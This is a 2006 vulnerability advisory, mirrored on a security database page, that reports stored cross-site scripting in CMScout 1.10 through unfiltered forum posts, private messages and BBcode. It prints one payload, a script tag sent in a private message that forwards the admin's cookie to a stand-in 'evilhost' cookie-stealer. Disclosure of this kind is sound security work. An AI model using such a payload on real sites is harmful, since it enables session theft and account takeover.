Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12524
HistoryMay 03, 2006 - 12:00 a.m.

Cmscout <= V1.10 multiple XSS attack vectors

2006-05-0300:00:00
vulners.com
5
JSON

Cmscout <= V1.10 multiple XSS attack vectors
Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)

CMScout is a CMS (Content management system) for scouting related groups from around the world.
A CMS is a piece of web software that makes it easy for you to install, and manage a website.
CMScout includes all the features of other major CMS's that are available (Like PHP-Nuke, Mambo, e107, etc.).

Added news items and events are properly filtered for potential XSS input, input in the forums and PM's however, is not.
For example, when one would send a pm to the admin like this:

Subject: whatever
Body: <script>window.navigate('http://www.evilhost.com/cookiestealer.php?c=&#39;+document.cookie&#41;&lt;/script&gt;

we could obtain the admin's cookie. The inside of BBcode isn't filtered either. This goes for the forums too.

Nomenumbra/[0x4F4C]

JSON